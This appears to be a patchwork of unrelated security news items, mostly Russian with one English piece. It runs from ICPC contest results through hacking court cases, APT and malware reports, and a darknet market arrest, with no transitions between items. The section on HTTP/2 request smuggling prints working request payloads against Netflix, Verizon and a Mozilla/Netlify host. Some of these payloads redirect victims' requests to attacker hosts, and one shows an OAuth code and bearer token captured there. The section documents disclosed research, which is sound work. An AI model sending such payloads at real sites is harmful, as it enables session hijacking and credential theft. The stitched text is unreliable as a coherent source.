Примечательно, что Россия имела все шансы стать второй по числу участвующих университетов. В последний момент с дистанции сошла «сборная» Китая, насчитывающая 18 команд. Истинная причина отказа страны от участия в ICPC не установлена, но официально страна ссылается на пандемию коронавируса.
По количеству подтвержденных случаев коронавируса (7,52 млн на 6 октября 2021 г.) Россия уступает как минимум США, Индии, Великобритании, Германии и Бразилии. Как в итоге распределились бы призовые места, если бы Китай не отказался от участия, неизвестно.
Другие призеры соревнования
Россия получила три золотых медали из четырех, выиграв мировой чемпионат ICPC. «Серебро» досталось командам Университета Вроцлава (пятое место, Польша), Кембриджского университета (шестое место, Великобритания), Белорусского государственного университета (седьмое место) и Университета Бухареста (Румыния, восьмое место).
Бронзовые медали получили студенты Массачусетского технологического института (США), Харьковского национального университета радиоэлектроники (Украина), Иллинойсского университета в Урбане-Шампейне (США), и Высшей школы экономики (Россия). Эти команды заняли с девятого по 12 места соответственно. Итого, из 12 медалей россияне получили четыре.
Россия всегда впереди
Чемпионат ICPC проходит ежегодно. Первое соревнование состоялось в 1970 г. За последние 17 лет Россия каждый год входила в четверку лидеров и получала золотые медали.
Например, в 2004 г. «золото» взяли Санкт-Петербургский ИТМО (первое место) и Пермский госуниверситет (четвертое место), в 2005 г. – Московский госуниверситет (МГУ) и ИТМО (второе и третье места соответственно), в 2006 г. – Алтайский государственный технический университет (третье место) и Саратовский госуниверситет (СГУ, первое место). В 2007 г. «золото» получила команда ИТМО (третье место), год спустя добравшись до первого места. Золотая медаль также досталась команде Ижевского государственного технического университета (третье место)
Россия продолжила одерживать победы и в 2009 г., получив три золотые медали из четырех. Это заслуга команд ИТМО (победитель), а также Санкт-Петербургского и Саратовского госуниверситетов (третье и четвертое места).
Прокуратура Могилевской области направила в суд уголовное дело в отношении 31-летнего бобруйчанина. Мужчине инкриминированы несанкционированный доступ к компьютерной информации и использование вредоносных программ, сообщили БЕЛТА в службе информации ведомства.
Как установлено, с 2016 года по ноябрь 2020 года обвиняемый находил в свободном доступе в интернете базы данных логинов и паролей к электронной почте пользователей. При этом он пользовался ранее установленными на его персональном компьютере вредоносными программами, с помощью которых проверял сведения баз данных на пригодность использования на определенных игровых интернет-ресурсах.
Впоследствии обвиняемый продавал игровые аккаунты через зарегистрированный им интернет-магазин, а также иные электронные торговые площадки. Полученный преступный доход составил свыше 100 тыс. российских рублей.
При проверке материалов уголовного дела в прокуратуре Могилевской области пришли к выводу об обоснованности обвинения и объективном исследовании обстоятельств преступления. Действия мужчины квалифицированы по ст.349 и ст.354 УК.
Примененную ранее к бобруйчанину меру пресечения в виде подписки о невыезде и надлежащем поведении прокуратура оставила без изменения.
Уголовное дело находилось в производстве управления Следственного комитета по Могилевской области.
Web-системы, в которых фронтэнд принимает соединения по HTTP/2 и передаёт бэкенду по HTTP/1.1, оказались подвержены новому варианту атаки "HTTP Request Smuggling", позволяющей через отправку специально оформленных клиентских запросов вклиниваться в содержимое запросов других пользователей, обрабатываемых в том же потоке между фронтэндом и бэкендом. Атака может быть использована для подстановки вредоносного JavaScript-кода в сеанс с легитимным сайтом, обхода систем ограничения доступа и перехвата параметров аутентификации.
Проблеме подвержены web-прокси, балансировщики нагрузки, web-акселераторы, системы доставки контента и прочие конфигурации, в которых запросы перенаправляются по схеме фронтэнд-бэкенд. Автор исследования продемонстрировал возможность атаки на системы Netflix, Verizon, Bitbucket, Netlify CDN и Atlassian, и получил 56 тысяч долларов в программах по выплате вознаграждений за выявление уязвимостей. Наличие проблемы также подтверждено в продуктах F5 Networks. Частично проблема затрагивает mod_proxy в http-сервере Apache (CVE-2021-33193). Средства для проведения атак уже добавлены в инструментарий Burp и доступны в форме расширения Turbo Intruder.
Принцип действия нового метода вклинивания запросов в трафик аналогичен уязвимости, выявленной тем же исследователем два года назад, но ограниченной фронтэндами, принимающими запросы по HTTP/1.1. Напомним, что в схеме фронтэнд- бэкенд запросы клиентов принимает дополнительный узел - фронтэнд, который устанавливает долгоживующее TCP-соединение с бэкендом, осуществляющим непосредственную обработку запросов. Через данное общее соединение обычно передаются запросы разных пользователей, которые следуют по цепочке один за другим с разделением средствами протокола HTTP.
Классическая атака "HTTP Request Smuggling" основывалась на том, что фронтэнды и бэкенды по разному трактуют использование HTTP-заголовков "Content-Length" (определяет общий размер данных в запросе) и "Transfer-Encoding: chunked" (позволяет передавать данные по частям). Например, если фронтэнд поддерживает только "Content-Length", но игнорирует "Transfer-Encoding: chunked", то атакующий может отправить запрос, в котором одновременно указаны заголовки "Content-Length" и "Transfer-Encoding: chunked", но размер в "Content-Length" не соответствует размеру chunked-цепочки. В этом случае фронтэнд обработает и перенаправит запрос в соответствии с "Content-Length", а бэкенд будет ожидать завершения блока на основе "Transfer-Encoding: chunked" и оставшийся хвост запроса атакующего окажется вначале чужого запроса, переданного следом.
В отличие от текстового протокола HTTP/1.1, разбор которого осуществляется на уровне строк, HTTP/2 является бинарным протоколом и манипулирует блоками данных заранее указанного размера. При этом в HTTP/2 используются псевдо- заголовки, соответствующие обычным заголовкам HTTP. В случае взаимодействия с бэкендом по протоколу HTTP/1.1, фронтэнд транслирует эти псевдо-заголовки в аналогичные HTTP-заголовки HTTP/1.1. Проблема в том, что бэкенд принимает решения о разборе потока уже на основе выставленных фронтэндом HTTP- заголовков, не имея сведений о параметрах изначального запроса.
В том числе в форме псевдо-заголовков могут быть переданы значения "content- length" и "transfer-encoding", несмотря на то, что в HTTP/2 они не используются, так как размер всех данных определяется в отдельном поле. Тем не менее, в процессе преобразования запроса HTTP/2 в HTTP/1.1 данные заголовки переносятся и могут ввести в заблуждение бэкенд. Выделяется два основных варианта атаки: H2.TE и H2.CL, в которых бэкенд вводится в заблуждение некорректным значением transfer-encoding или content-length, не соответствующим реальному размеру тела запроса, поступившего к фронтэнду по протоколу HTTP/2.
В качестве примера атаки H2.CL приводится указание некорректного размера в псевдо-заголовке content-length при отправке запроса HTTP/2 к Netflix. Данный запрос приводит к добавлению аналогичного HTTP-заголовка Сontent-Length при обращении к бэкенду по HTTP/1.1, но так как размер в Сontent-Length указан меньше фактического, то часть данных в хвосте обрабатывается как начало следующего запроса.
Например, запрос HTTP/2
Code:Copy to clipboard
:method POST
:path /n
:authority www.netflix.com
content-length 4
abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar
Приведёт к отправке бэкенду запроса:
Code:Copy to clipboard
POST /n HTTP/1.1
Host: www.netflix.com
Content-Length: 4
abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar
Так как Content-Length имеет значение 4, то бэкенд воспримет в качестве тела запроса только "abcd", а остальную часть "GET /n HTTP/1.1..." обработает как начало следом идущего запроса, привязанного к другому пользователю. Соответственно, произойдёт рассинхронизация потока и в ответ на следом идущий запрос будет выдан результат обработки подставного запроса. В случае с Netflix указание стороннего хоста в заголовке "Host:" в подставном запросе привело к выводу клиенту ответа "Location: https://02.rs?x.netflix.com/n" и позволило передать клиенту произвольное содержимое, в том числе выполнить свой JavaScript-код в контексте сайта Netflix.
Второй вариант атаки (H2.TE) связан с подстановкой заголовка "Transfer- Encoding: chunked". Использование псевдо-заголовка transfer-encoding в HTTP/2 запрещено спецификацией и запросы с ним предписано трактовать как некорректные. Несмотря на это, некоторые реализации фронтэндов не учитывают данное требование и допускают использование псвевдо-заголовка transfer- encoding в HTTP/2, который преобразуется в аналогичный заголовок HTTP. При наличии заголовка "Transfer-Encoding" бэкенд может воспринять его более приоритетным и выполнить разбор данных по частям в режиме "chunked" с использованием блоков разного размера в формате "{размер}\r\n{блок}\r\n{размер}\r\n{блок}\r\n0", несмотря на изначальное разделение по общему размеру.
Наличие подобной бреши было продемонстрировано на примере компании Verizon. При этом проблема касалась портала аутентификации и системы управления контентом, которая также используется на таких сайтах как Huffington Post и Engadget. Например, запрос клиента по HTTP/2:
Code:Copy to clipboard
:method POST
:path /identitfy/XUI
:authority id.b2b.oath.com
transfer-encoding chunked
0
GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10
x=
Приводил к передаче бэкенду запроса HTTP/1.1:
Code:Copy to clipboard
POST /identity/XUI HTTP/1.1
Host: id.b2b.oath.com
Content-Length: 66
Transfer-Encoding: chunked
0
GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10
x=
Бэкенд, в свою очередь, игнорировал заголовок "Content-Length" и выполнял разделение в потоке на основе "Transfer-Encoding: chunked". На практике атака позволила перенаправить запросы пользователей на свой сайт и в том числе перехватить запросы, связанные с аутентификацией OAuth, параметры которых светились в заголовке Referer, а также симулировать сеанс аутентификации и инициировать отправку системой пользователя учётных данных на хост атакующего.
Code:Copy to clipboard
GET /b2blanding/show/oops HTTP/1.1
Host: psres.net
Referer: https://id.b2b.oath.com/?…&code=secret
GET / HTTP/1.1
Host: psres.net
Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik…
Для атаки на реализации HTTP/2, не допускающие указание псевдо-заголовка transfer-encoding, был предложен ещё один метод, связанный с подстановкой заголовка "Transfer-Encoding" через его прикрепление к другим псевдо- заголовкам с разделением символом перевода строки (при преобразовании в HTTP/1.1 в подобном случае создаётся два отдельных HTTP-заголовка).
Например указанной проблеме оказались подвержены Atlassian Jira и Netlify CDN (используется для отдачи стартовой страницы Mozilla в Firefox). В частности, запрос HTTP/2
Code:Copy to clipboard
:method POST
:path /
:authority start.mozilla.org
foo b\r\n
transfer-encoding: chunked
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: evil-netlify-domain\r\n
Content-Length: 5\r\n
\r\n
x=
приводил к отправке бэкенду запроса HTTP/1.1
Code:Copy to clipboard
POST / HTTP/1.1\r\n
Host: start.mozilla.org\r\n
Foo: b\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 71\r\n
\r\n
0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: evil-netlify-domain\r\n
Content-Length: 5\r\n
\r\n
x=
Ещё одним вариантом подстановки заголовка "Transfer-Encoding" стало прикрепление его к имени другого псевдозаголовка или к строке с методом запроса. Например, при обращении к Atlassian Jira имя псевдо-заголовка "foo: bar\r\ntransfer-encoding" со значением "chunked" приводило к добавлению HTTP- заголовков "foo: bar" и "transfer-encoding: chunked", а указание в псевдо- заголовке ":method" значения "GET / HTTP/1.1\r\nTransfer-encoding: chunked" транслировалось в "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
Выявивший проблему исследователь также предложил технику туннелинга запросов для совершения атаки на фронтэнды, в которых для каждого IP-адреса устанавливается отдельное соединение с бэкендом и трафик разных пользователей не смешивается. Предложенная техника не позволяет вклиниваться в запросы других пользователей, но даёт возможность отравить общий кэш, влияющий на обработку других запросов, и позволяет выполнить подстановку внутренних HTTP- заголовков, используемых для передачи служебных сведений от фронтэнда к бэкенду (например, при аутентификации на стороне фронтэнда в подобных заголовках бэкенду могут передаваться сведения о текущем пользователе). В качестве примера применения метода на практике при помощи отравления кэша удалось получить контроль за страницами в сервисе Bitbucket.
Молодой человек из Днепропетровской области ступил на скользкую дорожку киберпреступности и попался. Вместе с товарищем, они занимались тем, что взламывали аккаунты интернет-пользователей и продавали добытую там информацию заинтересованным киберпреступникам через тематические форумы.
В качестве первоначальной наводки, использовались базы интернет-пользователей, которые приятель покупал в хакерских сообществах. Эти списки пользователей айтишник прогонял через программу «All-in-one-checker-cracked», чтобы подобрать к ним связки email(телефон)/пароль и выбрать из те, что могут представлять «коммерческий» интерес.
Данная вредоносная программа взламывает аккаунты методом перебора паролей и анализирует содержимое популярных почтовых серверов, включая папки «Спам» и «Удаленные», и ищет нужную информацию (по ключевым словам, адресам и т.п). Ее цель – получение доступа к ценной конфиденциальной информации, а также банковским и электронным платежным аккаунтам.
Выполняя задание, хакер, в числе прочего, получил доступ к почтовому ящику HotMail некой гражданки Украины, что дало ему возможность получить ее персональные данные, которые, согласно действующего законодательства, являются информацией с ограниченным доступом, и он не имел права доступа к ней. Обнаружив взлом, женщина обратилась в Киберполицию, где и напали на след преступного тандема.
Согласно правовой квалификации, молодой человек совершил нарушение ч. 2 ст. 361 УК (несанкционированное вмешательство в работу компьютерных систем, повлекшее утечку информации, по предварительному сговору группой лиц).
Когда подозрение хакеру было предъявлено, он испугался, сдал своего приятеля и пошел на заключение соглашения с прокурором о добровольном признании вины и стал всячески содействовать следствию. Правоохранители выяснили, что молодой человек ранее не привлекался за совершение преступлений, не состоит на учете нарколога и вообще, в целом, характеризуется положительно его окружением.
Согласно решению суда, совершенное правонарушение заслуживает наказания в виде лишения свободы сроком на 3 года. Помимо этого, молодого человека лишили права в течение года работать в сферах, связанных с использованием вычислительной техники, а также конфисковали его «орудие преступления» - ноутбук, с помощью которого он производил взлом интернет-аккаунтов.
Учитывая чистосердечное раскаяние и отсутствие криминальной предыстории, судья счел возможным исправление подсудимого без заключения за решетку, если в течение года он не совершит нового преступления.
Согласно [отчету](https://www.trendmicro.com/en_us/research/22/a/earth-lusca- sophisticated-infrastructure-varied-tools-and-techni.html) Trend Micro, китайская кибершпионская группировка Earth Lusca не только следит за стратегическими целями, но также занимается финансово мотивированными атаками для получения прибыли.
Исследователи пишут, что последние годы хак-группа шпионила за самыми разными целями, которые могли представлять интерес для китайского правительства, например:
• государственные учреждения Тайваня, Таиланда, Филиппин, Вьетнама, ОАЭ, Монголии и Нигерии;
• учебные заведения Тайваня, Гонконга, Японии и Франции;
• СМИ на Тайване, в Гонконге, Австралии, Германии и Франции;
• продемократические и правозащитные политические организации и движения в Гонконге;
• исследовательские организации, изучающие COVID-19 в США;
• телекоммуникационные компании Непала;
• религиозные движения, запрещенные в материковом Китае
Интересно, что одновременно с этим группировка успевала атаковать игорные компании в Китае и различные криптовалютные платформы, похищая чужие средства.
Издание The Record [отмечает](https://therecord.media/earth-lusca-threat- actor-targets-governments-and-cryptocurrency-companies-alike/), что хак- группы, практикующие как финансово мотивированные, так и шпионские атаки, в последнее время перестают быть редкостью. Например, хакеры из Ирана взламывают VPN-устройства по всему миру, выбирают важные цели, необходимые им для сбора данных, а «излишки» продают в даркнете, на форумах, которые часто посещают операторы шифровальщиков.
Северокорейские хакеры и вовсе представляют собой отдельную категорию, так как некоторые из них явно уполномочены государством и устраивают ограбления банков и криптовалютных бирж, чтобы собирать деньги для своей страны, которая давно находится под жесткими экономическими санкциями.
Что касается Китая, подобное поведение и ранее наблюдалось у некоторых хак- групп из Поднебесной. Например, в [отчете](https://www.mandiant.com/resources/report-apt41-double-dragon-a-dual- espionage-and-cyber-crime-operation) FireEye рассказывается об APT41 (она же Double Dragon), чья тактика во многом схожа с Earth Lusca.
Trend Micro сообщает, что в своих кампаниях участники Earth Lusca в основном используют три метода атак:
• эксплуатация неисправленных уязвимостей на доступных из интернета серверах и веб-приложениях (к примеру, Oracle GlassFish и Microsoft Exchange);
• адресные фишинговые письма, которые содержат ссылки на вредоносные файлы или сайты;
• атаки типа watering hole, когда жертв заманивают на заранее скомпрометированные сайты, и там пытаются заразить их вредоносным ПО.
В большинстве случаев злоумышленники стремились развернуть Cobalt Strike на зараженных хостах, а пейлоды, используемые в ходе второй фазы атаки, включают бэкдоры [Doraemon](https://www.welivesecurity.com/2021/08/24/sidewalk-may-be- as-dangerous-as-crosswalk/), [ShadowPad](https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of- privately-sold-malware-in-chinese-espionage/), [Winnti](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat- intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) и [FunnySwitch](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat- intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/), а также веб- шеллы AntSword и Behinder.
Также исследователи отметили, что группировка нередко разворачивает на зараженных хостах малварь для майнинга. Хотя остается неясным, делается это ради добычи криптовалюты или это способ отвлечь внимание ИТ-специалистов компании-жертвы, которые могут поверить, что взлом был связан с обычным ботнетом для майнинга, а не со сложной шпионской операцией.
Cybersecurity researchers have disclosed a new kind of Office malware distributed as part of a malicious email campaign that targeted more than 80 customers worldwide in an attempt to control victim machines and steal information remotely.
The tool — dubbed "[APOMacroSploit](https://research.checkpoint.com/2021/apomacrosploit- apocalyptical-fud-race/)" — is a macro exploit generator that allows the user to create an Excel document capable of bypassing antivirus software, Windows Antimalware Scan Interface (AMSI), and even Gmail and other email-based phishing detection.
APOMacroSploit is believed to be the work of two French-based threat actors
"Apocaliptique" and "Nitrix," who are estimated to have made at least $5000 in
less than two months selling the product on hackforums[.]net.
About 40 hackers in total are said to be behind the operation, utilizing 100
different email senders in a slew of attacks targeting users in more than 30
different countries. The attacks were spotted for the first time at the end of
November 2020, according to cybersecurity firm Check Point.
"The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script," the firm said in a Tuesday report.
This system command script is retrieved from cutt.ly, which directs to servers hosting multiple BAT scripts that have the nickname of the customers attached to the filenames. The scripts are also responsible for executing the malware ("fola.exe") on Windows systems, but not before adding the malware location in the exclusion path of Windows Defender and disabling Windows cleanup.
In one of the attacks, the malware — a Delphi Crypter followed by a second-
stage remote access Trojan called BitRAT — was found hosted on a Bulgarian
website catering to medical equipment and supplies, implying that the
attackers breached the website to store the malicious executable.
The idea of using "[crypters](https://www.fireeye.com/blog/threat-
research/2018/09/increased-use-of-delphi-packer-to-evade-malware-
classification.html)" or "packers" has become increasingly popular among
threat actors to not only compress but also to make malware samples more
evasive and reverse engineer.
BitRAT, which
was formally documented last August, comes with features to mine
cryptocurrencies, hack webcams, log keystrokes, download and upload arbitrary
files, and remotely control the system via a command-and-control server, which
in this case resolved to a sub-domain of a legitimate Bulgarian website for
video surveillance systems.
Further investigation by Check Point involved chasing the digital trail left
by the two operators — including two League of Legends player profiles —
ultimately leading the researchers to unmask the real identity of Nitrix, who
revealed his actual name on Twitter when he posted a picture of a ticket he
bought for a concert in December 2014.
While Nitrix is a software developer from Noisy-Le-Grand with four years of experience as a software developer, Apocaliptique's use of alternative names such as "apo93" or "apocaliptique93" has stirred up possibilities that the individual may also be a French resident, as "93" is the colloquial name for the French department of Seine-Saint- Denis.
Check Point Research said it has alerted law enforcement authorities about the identities of the attackers.
Хорватский исследователь Боян Здрня (Bojan Zdrnja) обнаружил вредоносное расширение для Chrome, злоупотребляющее функциями синхронизации Chrome Sync.
Тем, кто не использует Chrome, напомню, что эта функция используется для синхронизации данных между разными устройствами пользователя, и хранит копии всех пользовательских закладок, историю просмотров, пароли, а также настройки браузера и его расширений на облачных серверах Google. Но, как оказалось, синхронизацию можно использовать для отправки команд зараженным браузерам, а также кражи данных из зараженных систем, минуя брандмауэры и другие средства защиты.
Здрня пишет, что в ходе изученного им инцидента злоумышленник получил доступ к компьютеру жертвы, но не смог похитить данные, так как те находились внутри портала для сотрудников. Тогда хакер загрузил на машину жертвы вредоносное расширение для Chrome и запустил его через Developer Mode.

Расширение маскировалось под защитный продукт от компании Forcepoint и содержало вредоносный код, который злоупотреблял функцией синхронизации, позволяя атакующему контролировать зараженный браузер. В данном случае расширение использовалось для манипулирования данными во внутреннем веб- приложении, к которому жертва имела доступ.
Вредоносный код, обнаруженный в расширении, позволял злоумышленнику создать специальное текстовое поле для хранения ключей токенов, которые затем синхронизировались с облачными серверами Google. По словам исследователя, в таком поле могут храниться любые данные: это могла быть информация, собранная вредоносным расширением о зараженном браузере (например, имена пользователей, пароли, криптографические ключи и так далее), или напротив — команды, которые расширение должно выполнить на зараженном хосте.
«Чтобы скачать, прочитать или удалить эти ключи, злоумышленнику нужно было лишь войти в систему с той же учетной записью в Google, но в другом браузере Chrome (это могла быть одноразовая учетная запись). После он мог взаимодействовать с браузером Chrome в сети жертвы, злоупотребляя инфраструктурой Google», — пишет эксперт.
Click to expand...
Таким образом, вредоносное расширение может использоваться для «слива» данных из корпоративных сетей в Chrome злоумышленника, причем минуя локальные средства защиты. Ведь украденный контент или команды передаются через инфраструктуру Chrome, а браузеру Google обычно разрешено беспрепятственно работать и передавать данные, то есть активность хакера не вызовет подозрений и не будет блокироваться в большинстве корпоративных сетей.
«Если теперь вы подумываете о блокировке доступа к clients4.google.com, будьте осторожны — это очень важный сайт для Chrome, который, в числе прочего, используется для проверки того, подключен ли Chrome к интернету», — предупреждает Здрня.
Click to expand...
Вместо этого исследователь советует использовать корпоративные функции Chrome и групповые политики, чтобы блокировать или жестко контролировать то, какие расширения могут быть установлены в браузере.
Источник: xakep.ru/2021/02/05/chrome-sync-abuse/
ФБР, АНБ и ведомства, входящие в разведывательный альянс Five Eyes, который объединяет спецслужбы Австралии, Канады, Новой Зеландии, США и Великобритании, опубликовали [список](https://www.cisa.gov/news-events/cybersecurity- advisories/aa24-317a) из 15 самых часто эксплуатируемых уязвимостей 2023 года. Подавляющее большинство проблем из этого списка находились под атаками еще в статусе 0-day.
«В 2023 году злоумышленники использовали больше уязвимостей нулевого дня для компрометации корпоративных сетей, чем в 2022 году, что позволяло им проводить кибероперации против более приоритетных целей», — пишут авторы документа.
Click to expand...
Также они отмечают, что большинство самых «популярных» уязвимостей 2023 году изначально эксплуатировались злоумышленниками как уязвимости нулевого дня, тогда как в 2022 году к этой категории относились менее половины уязвимостей.
В отчете подчеркивается, что 12 из 15 уязвимостей из нового списка получили исправления в 2023 году. То есть хакеры сосредоточивают свои атаки именно на 0-day, эксплуатируя уязвимости, когда о них уж стало известно, но исправлений еще не существовало.
«Полезность уязвимостей со временем снижается, поскольку все больше систем получают исправления или замену. Злоумышленники получают все меньше пользы от 0-day эксплоитов, благодаря международным усилиям специалистов по кибербезопасности, которые позволяют сократить срок службы 0-day уязвимостей», — уверяют при этом правоохранители.
Click to expand...
Список самых эксплуатируемых в 2023 году уязвимостей выглядит следующим образом:
CVE| Производитель| Уязвимый продукт| Тип проблемы
---|---|---|---
CVE-2023-3519| Citrix|
NetScaler ADC/Gateway| Инъекция кода
CVE-2023-4966| Citrix|
NetScaler ADC/Gateway| Переполнение буфера
CVE-2023-20198| Cisco| IOS
XE Web UI| Повышение привилегий
CVE-2023-20273| Cisco| IOS
XE| Инъекция команд в Web UI
CVE-2023-27997| Fortinet|
FortiOS/FortiProxy SSL-VPN| Переполнение буфера хипа
CVE-2023-34362| Progress|
MOVEit Transfer| SQL-инъекция
CVE-2023-22515| Atlassian|
Confluence Data Center/Server| Неработающий контроль доступа
CVE-2021- 44228
(Log4Shell)| Apache| Log4j2| Удаленное выполнение кода
CVE-2023-2868| Barracuda
Networks| ESG Appliance| Некорректная проверка ввода
CVE-2022-47966| Zoho|
ManageEngine Multiple Products| Удаленное выполнение кода
CVE-2023-27350| PaperCut|
MF/NG| Некорректный контроль доступа
CVE-2020-1472| Microsoft|
Netlogon| Повышение привилегий
CVE-2023-42793| JetBrains|
TeamCity| Обход аутентификации
CVE-2023-23397| Microsoft|
Office Outlook| Повышение привилегий
CVE-2023-49103| ownCloud|
graphapi| Раскрытие данных
Лидером «рейтинга» стала проблема CVE-2023-3519 в NetScaler ADC/Gateway, позволяющая удаленно выполнять код на непропатченных серверах. Напомним, что в прошлом году от хакерских атак на эту уязвимость пострадали тысячи серверов, в том числе принадлежащие организациям критической инфраструктуры США.
Правоохранители рекомендуют организациям во всем мире немедленно устранить перечисленные уязвимости и развернуть системы управления обновлениями, чтобы минимизировать риски потенциальных атак на свои сети. Ведь эксплуатация перечисленных в отчете багов, вероятно, продолжится и в 2025 году.
Группа уже 10 лет терроризирует госучреждения, строительные компании и сектор здравоохранения.
Исследователи кибербезопасности вычислили одного из преступников, который предположительно связан с киберпреступной группировкой XE Group.
Как сообщает компания Menlo Security, которая собрала информацию из разных онлайн-источников, Нгуен Хуу Тай, также известный под именами Джо Нгуен и Тхан Нгуен, «с наибольшей вероятностью причастен к XE Group».
XE Group (также известная как XeThanh) занимается киберпреступной деятельностью с 2013 года. Предполагается, что группа вьетнамского происхождения. Среди жертв группировки – госучреждения, строительные организации и сектор здравоохранения. XE Group известна тем, что компрометирует серверы с известными уязвимостями и получает выгоду от вторжений, устанавливая скрипты для кражи паролей или скимминга кредитных карт для онлайн-сервисов. Вот некоторые атаки группы:
В 2014 году хакеры создавали скрипты AutoIT, которые автоматически
генерировали электронные письма и простой валидатор кредитных карт для
украденных карт.
В марте этого года американские власти раскрыли попытки XE Group использовать
критическую уязвимость в устройствах Progress Telerik ( CVE-2019-18935 , CVSS:
9.8) для получения доступа к устройствам.
Противник также ранее пытался проникнуть в корпоративные сети через фишинговые
письма, отправленные с поддельных доменов, имитирующих PayPal и eBay.
Помимо маскировки EXE-файлов под PNG-файлы для обхода обнаружения, в некоторых
атаках злоумышленники использовали веб-шелл под названием «ASPXSpy» для
контроля над уязвимыми системами.
XE Group — одна из многих киберпреступных групп, которые угрожают безопасности разных секторов и организаций. Деятельность группировки может привести к утечке конфиденциальных данных, финансовым потерям и нарушению работы важных сервисов. Поэтому важно отслеживать действия хакеров и раскрывать их личности.
Исследование Menlo Security — это пример того, как можно использовать разные источники для выявления подозреваемых. Однако XE Group не единственная группа, которая занимается киберпреступностью. Поэтому необходимо постоянно повышать уровень кибербезопасности и защищать свои системы от возможных атак.
Разработчики Google выпустили Chrome версии 90.0.4430.85 (для Windows, Mac и Linux), устранив уязвимость нулевого дня, которую уже активно использовали хакеры.
Проблема имеет идентификатор CVE-2021-21224, и о ней сообщил ИБ-специалист Хосе Мартинес из VerSprite Inc. Также известно, что уязвимость связана с type confusion багом в движке V8.
Сам Мартинес пишет, что уязвимость связана с PoC-эксплоитом для Chrome, который был опубликован в Twitter на прошлой неделе. При этом сам исследователь сообщил Google о проблеме за неделю до этой публикации.
__https://twitter.com/x/status/1384654743642021891
Напомню, что баг, эксплоит для которого был обнародован в социальных сетях, не позволял сбежать из песочницы Chromium. То есть атакующему сначала нужно выйти из песочницы, скомбинировав проблему с другими уязвимостями.
Также в Chrome версии 90.0.4430.85 были исправлены менее серьезные ошибки, среди которых:
Источник: xakep.ru/2021/04/22/0day-patch-for-chrome/
Эксперты компаний Juniper и Qihoo 360 Netlab обнаружили атаки на хостинговое ПО Control Web Panel (ранее CentOS Web Panel), которое используется хостерами и крупными компаниями для размещения и управления крупной серверной инфраструктурой.
Неизвестные злоумышленники ищут уязвимые версии CWP по меньшей мере с февраля 2021 года используют против них эксплоит для некой старой уязвимости, что позволяет им получить доступ к интерфейсу администратора.
Затем на скомпрометированный сервер устанавливается бэкдор под названием Facefish, который может собирать информацию об устройстве, выполнять произвольные команды и воровать учетные данные SSH с зараженного хоста.
Также специалисты отмечают, что в этих атаках был задействован руткит, который злоумышленники устанавливали на взломанные серверы Linux для сохранения устойчивого присутствия в системе.
Схема атаки
Пока никакой подозрительной активности на взломанных серверах замечено не было. В Juniper предполагают, что злоумышленники могут создавать ботнет, чтобы потом продавать или сдавать в аренду доступ к скомпрометированным системам. Поскольку CWP обычно используется для поддержки крупных и важных сетей, доступ к любой к такой системе может дорого стоить на черном рынке.
По данным поисковика BinaryEdge, в настоящее время в интернете можно найти более 185 000 установок CWP, хотя неизвестно, сколько из них уязвимы перед атаками. Дело в том, что обе компании не опубликовали идентификатор CVE для используемой хакерами уязвимости (неизвестно, если ли вообще CVE у данного бага). При этом в блогах компаний опубликован код эксплоита, который ИТ- специалисты могут анализировать с целью создания правил для брандмауэра и блокирования входящих атак.
Источник: xakep.ru/2021/05/31/facefish/
Подозреваемый является 22-летним баварским студентом.
Федеральное ведомство уголовной полиции Германии (BKA) арестовало 22-летнего студента из Баварии, который подозревается в том, что является администратором даркнет-маркетплейса "Deutschland im Deep Web" (DiDW).
DiDW прекратил свою работу в начале этого года, на момент закрытия он насчитывал 16 000 активных пользователей, 72 из которых были продавцами запрещенных веществ. Правоохранители отмечают, что в течение нескольких лет этот рынок был одним из самых крупных сервисов по продаже запрещенных веществ в киберпреступном мире.
Согласно пресс-релизу BKA, арест был произведен во вторник, 25 октября. В рамках полицейских при участии прокурора из Центрального офиса по борьбе с киберпреступностью в Баварии были проведены обыски в двух жилых домах и изъяты многочисленные улики, включая компьютеры, носители информации и мобильные телефоны. Отмечается, что проведенным мероприятиям предшествовали месяцы тайных и технически сложных расследований с целью выявления и ареста подозреваемых.
DiDW был запущен в 2013 году. В 2016 году преступник, устроивший стрельбу в Мюнхене, утверждал, что купил орудие убийства и боеприпасы на этой платформе. В результате дарквеб-маркетплейс был закрыт в 2017 году, а BKA арестовала его администратора и приговорила его к семи годам тюрьмы в 2018 году.
В том же году появились две новые версии маркетплейса под названием "Deutschland im Deep Web ", на котором преступники торговали запрещенными веществами. Пойманный полицией 22-летний подозреваемый управлял третьей версией платформы с 2018 года. Ему грозит срок от 1 до 10 лет по 127 статье Уголовного кодекса.
source: bka.de/DE/Presse/Listenseite_Pressemitteilungen/2022/Presse2022/221027_PM_Darknet_Markplatz_Festnahme.html
Россия еще в марте 2024 года объявила в международный розыск основателя магазина «Профилактика оружия» Петра Врублевского, известного как Брюс и Пианист. Сам 19-летний владелец оружейного и силового сервиса с января 2022 года находится в Швейцарии, приостановившей на время специальной военной операции выдачу преступников в Россию.
Журналисты «Известий» напоминают, что Петр — сын Павла Врублевского, создателя процессинговой компании Chronopay. За Врублевским-старшим тянется длительный шлейф обвинений по киберпреступной тематике, последнее из которых было предъявлено в марте 2022 года, когда бизнесмена арестовали по делу об интернет-мошенничестве и неправомерном обороте средств платежей.
«После ареста отца начались проблемы и у Петра Врублевского. По данным источников "Известий", следствие считает сына предпринимателя соучастником вымогательства. В мае 2022-го по этому делу был задержан скандально известный боец MMA Асхаб Магомедов и его знакомый. Двух мужчин осудили по обвинению в вымогательстве 600 тысяч рублей», — утверждают журналисты.
